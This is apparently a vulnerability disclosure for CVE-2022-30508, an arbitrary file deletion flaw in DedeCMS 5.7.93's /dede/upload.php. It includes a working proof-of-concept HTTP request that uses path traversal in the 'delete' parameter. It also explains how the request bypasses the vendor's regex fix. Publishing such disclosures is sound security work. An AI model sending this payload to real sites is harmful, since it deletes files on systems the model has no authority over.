Headline
CVE-2022-30508: Vulnerability/1.md at master · 1security/Vulnerability
DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.
Permalink
Dedecms has Arbitrary file deletion
- Affected product: Dedecms 5.7.93
- Attack type: Remote
- Affected component: /dede/upload.php
- Description: DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.
- Comment: The Version 5.93 used to repair Arbitrary file deletion, but there is still a way to bypass
POC
You can attack with low administrator privileges
GET /dede/upload.php?delete=dede/../../../../../../../../../flag HTTP/1.1
Host: dedecms5793
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=5dmda8e360sct3jfhq5bhupfi1; _csrf_name_087a8580=71d08ef049948bbc07ae269bda502532; _csrf_name_087a85801BH21ANI1AGD297L1FF21LN02BGE1DNG=d7b9a721f2afba6c; DedeUserID=3; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=55ecf92b6c33a0e4; DedeLoginTime=1651835206; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=a93eb3d3f937052f; lastCid=1; lastCid1BH21ANI1AGD297L1FF21LN02BGE1DNG=2b4648712e49895f; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Details
The Version 5.93 added 17 lines of code.
$delete = preg_replace("#^([.]*[/]*)*#", "", $delete);
It can easily be bypassed by ‘dede/…/…/…/…/…/…/…/…/…/flag’
Then at line 34 the file is deleted